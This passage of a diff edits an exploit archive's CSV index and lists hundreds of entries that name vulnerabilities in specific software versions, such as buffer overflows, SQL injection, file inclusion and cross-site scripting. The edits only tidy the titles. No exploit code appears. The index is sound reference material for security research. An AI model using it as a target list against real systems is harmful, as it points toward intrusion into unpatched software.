Ivgi The-Insider",windows,remote,0 24025,platforms/windows/remote/24025.txt,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Information Disclosure",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 24026,platforms/php/webapps/24026.txt,"phpBB 2.0.x - album_portal.php Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0 24027,platforms/linux/local/24027.txt,"UTempter 0.5.x - Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",linux,local,0 @@ -21311,13 +21312,13 @@ id,file,description,date,author,platform,type,port 24118,platforms/windows/remote/24118.txt,"Microsoft Outlook Express 6.0 - URI Obfuscation",2004-05-13,http-equiv,windows,remote,0 24119,platforms/windows/dos/24119.txt,"Microsoft Internet Explorer 5.0.1 - http-equiv Meta Tag Denial of Service",2004-05-14,"Mike Mauler",windows,dos,0 24120,platforms/linux/remote/24120.c,"LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0 -24121,platforms/osx/remote/24121.txt,"Apple Mac OS X 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0 +24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0 24122,platforms/cgi/webapps/24122.txt,"TurboTrafficTrader C 1.0 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2004-05-17,"Kaloyan Olegov Georgiev",cgi,webapps,0 24123,platforms/linux/local/24123.sh,"WGet 1.x - Insecure File Creation Race Condition",2004-05-17,"Hugo Vazquez",linux,local,0 24124,platforms/php/webapps/24124.txt,"vBulletin 1.0/2.x/3.0 - 'index.php' User Interface Spoofing",2004-05-17,p0rk,php,webapps,0 24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0 24126,platforms/php/webapps/24126.txt,"osCommerce 2.x - File Manager Directory Traversal",2004-05-17,Rene,php,webapps,0 -24127,platforms/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x - Modpath Parameter Potential File Include",2004-05-17,waraxe,php,webapps,0 +24127,platforms/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x - Modpath Parameter Potential File Inclusion",2004-05-17,waraxe,php,webapps,0 24128,platforms/windows/dos/24128.txt,"ActivePerl 5.x / Cygwin 1.5.x - System Function Call Buffer Overflow",2004-05-18,"Oliver Karow",windows,dos,0 24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 24130,platforms/multiple/dos/24130.txt,"ActivePerl 5.x / Larry Wall Perl 5.x - Duplication Operator Integer Overflow",2004-05-18,"Matt Murphy",multiple,dos,0 @@ -21359,7 +21360,7 @@ id,file,description,date,author,platform,type,port 24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0 24166,platforms/php/webapps/24166.txt,"PHP-Nuke 5.x/6.x/7.x - Direct Script Access Security Bypass",2004-06-01,Squid,php,webapps,0 24167,platforms/php/webapps/24167.txt,"SquirrelMail 1.2.x - From Email Header HTML Injection",2004-06-03,anonymous,php,webapps,0 -24168,platforms/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - Script Settings Parameter Remote PHP File Include",2004-06-03,"The Warlock [BhQ]",php,webapps,0 +24168,platforms/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - Script Settings Parameter Remote PHP File Inclusion",2004-06-03,"The Warlock [BhQ]",php,webapps,0 24169,platforms/php/webapps/24169.txt,"Crafty Syntax Live Help 2.7.3 - Multiple HTML Injection Vulnerabilities",2004-06-04,"HNK Technology Solutions",php,webapps,0 24170,platforms/multiple/dos/24170.txt,"Colin McRae Rally 2004 - Multiplayer Denial of Service",2004-06-04,"Luigi Auriemma",multiple,dos,0 24171,platforms/windows/local/24171.c,"SmartStuff FoolProof Security Program 3.9.x - Administrative Password Recovery",2004-06-05,"Cyrillium Security",windows,local,0 @@ -21400,7 +21401,7 @@ id,file,description,date,author,platform,type,port 24209,platforms/windows/dos/24209.txt,"Sygate Personal Firewall Pro 5.5 - Local Denial of Service",2004-06-14,"Tan Chew Keong",windows,dos,0 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - Local X Font Server Buffer Overflow",2003-03-10,watercloud,hp-ux,local,0 24211,platforms/windows/dos/24211.txt,"Microsoft Internet Explorer 6 - HREF Save As Denial of Service",2004-06-15,"Rafel Ivgi The-Insider",windows,dos,0 -24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - Remote module_db.php File Include",2004-06-15,loofus,php,webapps,0 +24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - Remote module_db.php File Inclusion",2004-06-15,loofus,php,webapps,0 24213,platforms/windows/remote/24213.txt,"Microsoft Internet Explorer 5.0.1 - Wildcard DNS Cross-Site Scripting",2004-06-15,"bitlance winter",windows,remote,0 24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x - Registration_Rules.asp Cross-Site Scripting",2004-06-15,"Ferruh Mavituna",asp,webapps,0 24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 - usersL.php3 Multiple Parameter SQL Injection",2004-06-15,HEX,php,webapps,0 @@ -21443,11 +21444,11 @@ id,file,description,date,author,platform,type,port 24253,platforms/multiple/remote/24253.txt,"12Planet Chat Server 2.9 - Cross-Site Scripting",2004-07-05,"Donato Ferrante",multiple,remote,0 24254,platforms/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 - Email Header HTML Injection",2004-07-05,"Roman Medina-Heigl Hernandez",cgi,webapps,0 24255,platforms/php/webapps/24255.txt,"JAWS 0.2/0.3 - 'index.php' gadget Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0 -24256,platforms/php/webapps/24256.php,"JAWS 0.2/0.3 - Cookie manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0 +24256,platforms/php/webapps/24256.php,"JAWS 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0 24257,platforms/php/webapps/24257.txt,"JAWS 0.2/0.3 - 'index.php' action Parameter Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0 24258,platforms/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Privilege Escalation",2013-01-20,LiquidWorm,windows,local,0 24259,platforms/linux/remote/24259.c,"Ethereal 0.x - Multiple Unspecified iSNS / SMB / SNMP Protocol Dissector Vulnerabilities",2004-08-05,"Rémi Denis-Courmont",linux,remote,0 -24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0 +24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0 24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - comersus_message.asp Cross-Site Scripting",2004-07-07,"Thomas Ryan",asp,webapps,0 24262,platforms/windows/remote/24262.html,"Opera Web Browser 7.5x - IFrame OnLoad Address Bar URL Obfuscation",2004-07-08,"bitlance winter",windows,remote,0 24263,platforms/windows/remote/24263.txt,"Mozilla 1.7 - External Protocol Handler",2004-07-08,"Keith McCanless",windows,remote,0 @@ -21476,7 +21477,7 @@ id,file,description,date,author,platform,type,port 24286,platforms/cgi/webapps/24286.txt,"Gattaca Server 2003 - Cross-Site Scripting",2004-07-15,dr_insane,cgi,webapps,0 24287,platforms/cgi/webapps/24287.txt,"BoardPower Forum - ICQ.cgi Cross-Site Scripting",2004-07-15,"Alexander Antipov",cgi,webapps,0 24288,platforms/windows/dos/24288.txt,"Symantec Norton AntiVirus 2001/2002/2003/2004 - Script Blocker Denial of Service",2004-07-16,vozzie,windows,dos,0 -24289,platforms/php/webapps/24289.c,"Artmedic Webdesign Kleinanzeigen Script - File Include",2004-07-19,"Adam Simuntis",php,webapps,0 +24289,platforms/php/webapps/24289.c,"Artmedic Webdesign Kleinanzeigen Script - File Inclusion",2004-07-19,"Adam Simuntis",php,webapps,0 24290,platforms/php/webapps/24290.txt,"CuteNews 1.3 - Comment HTML Injection",2004-07-19,DarkBicho,php,webapps,0 24291,platforms/php/webapps/24291.txt,"Outblaze Webmail - HTML Injection",2004-07-19,DarkBicho,php,webapps,0 24292,platforms/php/webapps/24292.txt,"Adam Ismay Print Topic Mod 1.0 - SQL Injection",2004-07-19,"Bartek Nowotarski",php,webapps,0 @@ -21526,8 +21527,8 @@ id,file,description,date,author,platform,type,port 24335,platforms/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual Escribá",unix,local,0 24336,platforms/cgi/remote/24336.txt,"myServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting",2004-07-30,dr_insane,cgi,remote,0 24337,platforms/cgi/remote/24337.txt,"myServer 0.6.2 - math_sum.mscgi Multiple Parameter Remote Overflow",2004-07-30,dr_insane,cgi,remote,0 -24338,platforms/linux/remote/24338.c,"Citadel/UX 5.9/6.x - Username Buffer Overflow (1)",2004-07-30,CoKi,linux,remote,0 -24339,platforms/linux/remote/24339.c,"Citadel/UX 5.9/6.x - Username Buffer Overflow (2)",2004-07-30,Nebunu,linux,remote,0 +24338,platforms/linux/remote/24338.c,"Citadel/UX 5.9/6.x - 'Username' Buffer Overflow (1)",2004-07-30,CoKi,linux,remote,0 +24339,platforms/linux/remote/24339.c,"Citadel/UX 5.9/6.x - 'Username' Buffer Overflow (2)",2004-07-30,Nebunu,linux,remote,0 24340,platforms/php/webapps/24340.txt,"PowerPortal 1.1/1.3 - Private Message HTML Injection",2004-07-30,vampz,php,webapps,0 24341,platforms/php/webapps/24341.txt,"Fusionphp Fusion News 3.3/3.6 - Administrator Command Execution",2004-07-30,"Joseph Moniz",php,webapps,0 24342,platforms/cgi/remote/24342.txt,"Webcam Corp Webcam Watchdog 4.0.1 - sresult.exe Cross-Site Scripting",2004-08-02,dr_insane,cgi,remote,0 @@ -21603,8 +21604,8 @@ id,file,description,date,author,platform,type,port 24414,platforms/multiple/remote/24414.txt,"keene digital media server 1.0.2 - Directory Traversal variant",2004-08-26,"GulfTech Security",multiple,remote,0 24415,platforms/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Vulnerabilities",2004-08-28,CyruxNET,php,webapps,0 24416,platforms/windows/dos/24416.txt,"Ipswitch WS_FTP Server 5.0.x - CD Command Malformed File Path Remote Denial of Service",2004-08-30,lion,windows,dos,0 -24417,platforms/windows/remote/24417.txt,"Xedus Web Server 1.0 - test.x username Parameter Cross-Site Scripting",2004-09-30,"James Bercegay",windows,remote,0 -24418,platforms/windows/remote/24418.txt,"Xedus Web Server 1.0 - testgetrequest.x username Parameter Cross-Site Scripting",2004-09-30,"James Bercegay",windows,remote,0 +24417,platforms/windows/remote/24417.txt,"Xedus Web Server 1.0 - test.x 'Username' Parameter Cross-Site Scripting",2004-09-30,"James Bercegay",windows,remote,0 +24418,platforms/windows/remote/24418.txt,"Xedus Web Server 1.0 - testgetrequest.x 'Username' Parameter Cross-Site Scripting",2004-09-30,"James Bercegay",windows,remote,0 24419,platforms/windows/remote/24419.txt,"Xedus Web Server 1.0 - Traversal Arbitrary File Access",2004-09-30,"James Bercegay",windows,remote,0 24420,platforms/asp/webapps/24420.txt,"Web Animations Password Protect - Multiple Input Validation Vulnerabilities",2004-08-31,Criolabs,asp,webapps,0 24421,platforms/linux/local/24421.c,"Debian bsdmainutils 6.0.14 - Calendar Information Disclosure",2004-08-31,"Steven Van Acker",linux,local,0 @@ -21679,7 +21680,7 @@ id,file,description,date,author,platform,type,port 24501,platforms/php/webapps/24501.txt,"Ultra Light Forum - Persistent Cross-Site Scripting",2013-02-14,"cr4wl3r ",php,webapps,0 24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow",2013-02-14,Metasploit,windows,remote,0 24504,platforms/hardware/webapps/24504.txt,"TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 -24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption Exploit",2013-02-15,"Julien Ahrens",windows,local,0 +24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption",2013-02-15,"Julien Ahrens",windows,local,0 24506,platforms/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps,0 24507,platforms/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",php,webapps,0 24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php id Parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 @@ -21794,7 +21795,7 @@ id,file,description,date,author,platform,type,port 24635,platforms/windows/dos/24635.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (2)",2004-09-27,Coolio,windows,dos,0 24636,platforms/windows/dos/24636.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (3)",2004-09-27,"Ken Hollis",windows,dos,0 24637,platforms/windows/dos/24637.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (4)",2004-09-27,"Ken Hollis",windows,dos,0 -24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - Remote PHP File Include",2004-09-27,"Himeur Nourredine",php,webapps,0 +24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - Remote PHP File Inclusion",2004-09-27,"Himeur Nourredine",php,webapps,0 24639,platforms/windows/dos/24639.c,"Microsoft SQL Server 7.0 - Remote Denial of Service (1)",2004-09-28,"securma massine",windows,dos,0 24640,platforms/windows/dos/24640.c,"Microsoft SQL Server 7.0 - Remote Denial of Service (2)",2004-09-28,"Sebastien Tricaud",windows,dos,0 24641,platforms/php/webapps/24641.txt,"WordPress 1.2 - wp-login.php Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 @@ -21908,7 +21909,7 @@ id,file,description,date,author,platform,type,port 24748,platforms/php/webapps/24748.txt,"event Calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0 24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0 24750,platforms/linux/local/24750.c,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (2)",2004-11-17,Gangstuck,linux,local,0 -24751,platforms/php/webapps/24751.pl,"phpBB 2.0.x - admin_cash.php Remote PHP File Include",2004-11-17,"Jerome Athias",php,webapps,0 +24751,platforms/php/webapps/24751.pl,"phpBB 2.0.x - admin_cash.php Remote PHP File Inclusion",2004-11-17,"Jerome Athias",php,webapps,0 24752,platforms/php/webapps/24752.txt,"Invision Power Board 2.0 - 'index.php' Post Action SQL Injection",2004-11-18,anonymous,php,webapps,0 24753,platforms/windows/local/24753.txt,"Mailtraq 2.x - Administration Console Privilege Escalation",2004-11-19,"Reed Arvin",windows,local,0 24754,platforms/windows/local/24754.txt,"Altiris Deployment Solution 5.6 - Client Service Privilege Escalation",2004-11-19,"Reed Arvin",windows,local,0 @@ -21943,7 +21944,7 @@ id,file,description,date,author,platform,type,port 24784,platforms/linux/remote/24784.txt,"File ELF 4.x - Header Unspecified Buffer Overflow",2004-11-29,anonymous,linux,remote,0 24812,platforms/windows/dos/24812.py,"aktiv-player 2.9.0 - Crash (PoC)",2013-03-15,metacom,windows,dos,0 24786,platforms/jsp/webapps/24786.txt,"Cisco Video Surveillance Operations Manager 6.3.2 - Multiple Vulnerabilities",2013-03-15,Bassem,jsp,webapps,0 -24813,platforms/linux/remote/24813.pl,"gnu wget 1.x - Multiple Vulnerabilities",2004-12-10,"Jan Minar",linux,remote,0 +24813,platforms/linux/remote/24813.pl,"GNU Wget 1.x - Multiple Vulnerabilities",2004-12-10,"Jan Minar",linux,remote,0 24788,platforms/windows/dos/24788.py,"Nitro Pro 8.0.3.1 - Crash (PoC)",2013-03-15,"John Cobb",windows,dos,0 24789,platforms/php/webapps/24789.rb,"WordPress LeagueManager Plugin 3.8 - SQL Injection",2013-03-15,"Joshua Reynolds",php,webapps,0 24790,platforms/php/webapps/24790.txt,"ClipShare 4.1.4 - Multiple Vulnerabilities",2013-03-15,AkaStep,php,webapps,0 @@ -21984,7 +21985,7 @@ id,file,description,date,author,platform,type,port 24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - online.php Cat Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 24828,platforms/linux/dos/24828.txt,"Opera Web Browser 7.54 - KDE KFMCLIENT Remote Command Execution",2004-12-13,"Giovanni Delvecchio",linux,dos,0 24829,platforms/php/webapps/24829.txt,"PHPGedView 2.5/2.6 - 'login.php' URL Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 -24830,platforms/php/webapps/24830.txt,"PHPGedView 2.5/2.6 - 'login.php' Username Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 +24830,platforms/php/webapps/24830.txt,"PHPGedView 2.5/2.6 - 'login.php' 'Username' Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24831,platforms/php/webapps/24831.txt,"PHPGedView 2.5/2.6 - 'login.php' Newlanguage Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24832,platforms/php/webapps/24832.txt,"PHPGedView 2.5/2.6 - Relationship.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24852,platforms/linux/remote/24852.txt,"MPG123 0.59 - Find Next File Remote Client-Side Buffer Overflow",2004-12-15,"Bartlomiej Sieka",linux,remote,0 @@ -22016,7 +22017,7 @@ id,file,description,date,author,platform,type,port 24861,platforms/php/webapps/24861.txt,"Rebus:list - 'list.php list_id Parameter' SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 24862,platforms/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple Cross-Site Scripting Vulnerabilities",2013-03-19,"Matthew R. Bucci",php,webapps,0 24863,platforms/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control",2013-03-20,Dr_IDE,windows,local,0 -24864,platforms/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - Username/Password Disclosure",2013-03-22,"Todor Donev",hardware,webapps,0 +24864,platforms/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - 'Username'/Password Disclosure",2013-03-22,"Todor Donev",hardware,webapps,0 24865,platforms/linux/dos/24865.txt,"GnuTLS libgnutls - Double-Free Certificate List Parsing Remote Denial of Service",2013-03-22,"Shawn the R0ck",linux,dos,0 24866,platforms/hardware/dos/24866.txt,"TP-Link TL-WR740N Wireless Router - Denial of Service",2013-03-22,LiquidWorm,hardware,dos,0 24867,platforms/php/webapps/24867.html,"WordPress IndiaNIC FAQs Manager Plugin 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps,0 @@ -22045,10 +22046,10 @@ id,file,description,date,author,platform,type,port 24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b - (awards.php id Parameter) Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0 24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilities",2013-03-27,Esac,php,webapps,0 24896,platforms/hardware/dos/24896.sh,"Konftel 300IP SIP-based Conference Phone 2.1.2 - Remote Bypass Reboot",2013-03-29,"Todor Donev",hardware,dos,0 -24897,platforms/windows/remote/24897.rb,"KNet Web Server 1.04b - Buffer Overflow SEH",2013-03-29,"Myo Soe",windows,remote,0 +24897,platforms/windows/remote/24897.rb,"KNet Web Server 1.04b - Buffer Overflow (SEH)",2013-03-29,"Myo Soe",windows,remote,0 24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php loginid Parameter' SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0 -24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF Username Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0 +24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF 'Username' Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0 24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor - Arbitrary Command Execution",2013-04-12,Metasploit,linux,remote,5666 24917,platforms/windows/dos/24917.py,"Easy DVD Player 3.5.1 - (libav) libavcodec_plugin.dll Denial of Service",2013-04-05,metacom,windows,dos,0 24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0 @@ -22117,7 +22118,7 @@ id,file,description,date,author,platform,type,port 25816,platforms/php/webapps/25816.txt,"Ovidentia FX - Remote File Inclusion",2005-06-10,Status-x,php,webapps,0 25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 - Jammail.pl Arbitrary Command Execution",2005-06-12,blahplok,cgi,webapps,0 25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 Beta Image Gallery - 'index.php' Cross-Site Scripting",2005-06-13,TheGreatOne2176,php,webapps,0 -24972,platforms/windows/dos/24972.c,"Flightgear 2.0/2.4 - Remote Format String Exploit",2013-04-22,Kurono,windows,dos,0 +24972,platforms/windows/dos/24972.c,"Flightgear 2.0/2.4 - Remote Format String",2013-04-22,Kurono,windows,dos,0 24973,platforms/php/webapps/24973.txt,"VoipNow 2.5 - Local File Inclusion",2013-04-22,i-Hmx,php,webapps,0 24974,platforms/hardware/remote/24974.rb,"Netgear DGN2200B - pppoe.cgi Remote Command Execution",2013-04-22,Metasploit,hardware,remote,0 24975,platforms/hardware/webapps/24975.txt,"D-Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0 @@ -22129,7 +22130,7 @@ id,file,description,date,author,platform,type,port 24982,platforms/multiple/remote/24982.txt,"Bolthole Filter 2.6.1 - Address Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 24983,platforms/multiple/remote/24983.txt,"Vilistextum 2.6.6 - HTML Attribute Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 24984,platforms/multiple/remote/24984.txt,"2Fax 3.0 Tab Expansion - Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 -24985,platforms/php/remote/24985.txt,"PHP 4/5 - addslashes() NULL Byte Bypass",2004-12-16,"Daniel Fabian",php,remote,0 +24985,platforms/php/remote/24985.txt,"PHP 4/5 - addslashes() Null Byte Bypass",2004-12-16,"Daniel Fabian",php,remote,0 24986,platforms/cgi/webapps/24986.txt,"IkonBoard 3.x - Multiple SQL Injections",2004-12-16,anonymous,cgi,webapps,0 24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0 24988,platforms/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 - /wp-admin/post.php content Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 @@ -22146,7 +22147,7 @@ id,file,description,date,author,platform,type,port 25186,platforms/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension - SQL Injection",2005-03-03,"Fabian Becker",php,webapps,0 25187,platforms/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x - Directory Traversal",2005-03-03,"Kristof Philipsen",windows,remote,0 25188,platforms/windows/remote/25188.txt,"Opera 7.x/Firefox 1.0/Internet Explorer 6.0 - Information Disclosure",2005-02-19,upken,windows,remote,0 -25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - Arbitrary Remote PHP File Include",2005-03-04,"Filip Groszynski",php,webapps,0 +25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - Arbitrary Remote PHP File Inclusion",2005-03-04,"Filip Groszynski",php,webapps,0 25190,platforms/multiple/remote/25190.txt,"ca3de - Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote,0 25191,platforms/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",multiple,remote,0 25192,platforms/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Inclusion",2005-03-05,mozako,php,webapps,0 @@ -22224,7 +22225,7 @@ id,file,description,date,author,platform,type,port 25065,platforms/php/webapps/25065.txt,"Magic Winmail Server 4.0 (Build 1112) - 'upload.php' Traversal Arbitrary File Upload",2005-01-27,"Tan Chew Keong",php,webapps,0 25066,platforms/multiple/remote/25066.txt,"WebWasher Classic 2.2/2.3 - HTTP CONNECT Unauthorized Access",2005-01-28,"Oliver Karow",multiple,remote,0 25067,platforms/cgi/webapps/25067.txt,"alt-n WebAdmin 3.0.2 - Multiple Vulnerabilities",2005-01-28,"David A. P?rez",cgi,webapps,0 -25068,platforms/php/webapps/25068.txt,"IceWarp Web Mail 5.3 - login.html username Parameter Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps,0 +25068,platforms/php/webapps/25068.txt,"IceWarp Web Mail 5.3 - login.html 'Username' Parameter Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps,0 25069,platforms/php/webapps/25069.txt,"IceWarp Web Mail 5.3 - accountsettings_add.html accountid Parameter Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps,0 25070,platforms/linux/dos/25070.c,"ngIRCd 0.6/0.7/0.8 - Remote Buffer Overflow",2005-01-28,"Florian Westphal",linux,dos,0 25071,platforms/php/webapps/25071.txt,"Captaris Infinite Mobile Delivery Webmail 2.6 - Full Path Disclosure",2005-01-29,steven@lovebug.org,php,webapps,0 @@ -22257,7 +22258,7 @@ id,file,description,date,author,platform,type,port 25101,platforms/php/webapps/25101.txt,"CitrusDB 0.3.6 - importcc.php CSV File SQL Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 25102,platforms/php/webapps/25102.txt,"CitrusDB 0.3.6 - Remote Authentication Bypass",2004-02-15,"RedTeam Pentesting",php,webapps,0 25103,platforms/php/webapps/25103.txt,"PHP-Nuke 6.x/7.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-15,waraxe,php,webapps,0 -25104,platforms/php/webapps/25104.txt,"CitrusDB 0.3.6 - Arbitrary Local PHP File Include",2005-02-15,"RedTeam Pentesting",php,webapps,0 +25104,platforms/php/webapps/25104.txt,"CitrusDB 0.3.6 - Arbitrary Local PHP File Inclusion",2005-02-15,"RedTeam Pentesting",php,webapps,0 25105,platforms/php/webapps/25105.txt,"osCommerce 2.2 - Contact_us.php Cross-Site Scripting",2005-02-15,"John Cobb",php,webapps,0 25106,platforms/linux/local/25106.c,"Typespeed 0.4.1 - Local Format String",2005-02-16,"Ulf Harnhammar",linux,local,0 25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos,0 @@ -22273,7 +22274,7 @@ id,file,description,date,author,platform,type,port 25117,platforms/php/webapps/25117.txt,"paFaq beta4 - comment.php Multiple Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 25118,platforms/php/webapps/25118.txt,"BibORB 1.3.2 - bibindex.php search Parameter Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps,0 25119,platforms/php/webapps/25119.txt,"BibORB 1.3.2 - Add Database Description Parameter Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps,0 -25120,platforms/php/webapps/25120.txt,"BibORB 1.3.2 - 'index.php' Traversal Arbitrary File manipulation",2005-02-17,"Patrick Hof",php,webapps,0 +25120,platforms/php/webapps/25120.txt,"BibORB 1.3.2 - 'index.php' Traversal Arbitrary File Manipulation",2005-02-17,"Patrick Hof",php,webapps,0 25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple Parameter SQL Injection",2005-02-17,"Patrick Hof",php,webapps,0 25122,platforms/linux/remote/25122.txt,"glFTPd 1.x/2.0 'ZIP' Plugins - Multiple Directory Traversal Vulnerabilities",2005-02-18,"Paul Craig",linux,remote,0 25123,platforms/php/webapps/25123.txt,"TrackerCam 5.12 - ComGetLogFile.php3 fm Parameter Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps,0 @@ -22283,8 +22284,8 @@ id,file,description,date,author,platform,type,port 25127,platforms/php/webapps/25127.txt,"PMachine Pro 2.4 - Remote File Inclusion",2005-02-19,kc,php,webapps,0 25128,platforms/windows/dos/25128.txt,"Easy Icon Maker 5.01 - Crash (PoC)",2013-05-01,Asesino04,windows,dos,0 25129,platforms/windows/remote/25129.html,"Microsoft Internet Explorer 6 - Pop-up Window Title Bar Spoofing",2005-02-21,"bitlance winter",windows,remote,0 -25130,platforms/windows/local/25130.py,"FuzeZip 1.0.0.131625 - SEH Buffer Overflow",2013-05-01,RealPentesting,windows,local,0 -25131,platforms/windows/local/25131.py,"WinArchiver 3.2 - SEH Buffer Overflow",2013-05-01,RealPentesting,windows,local,0 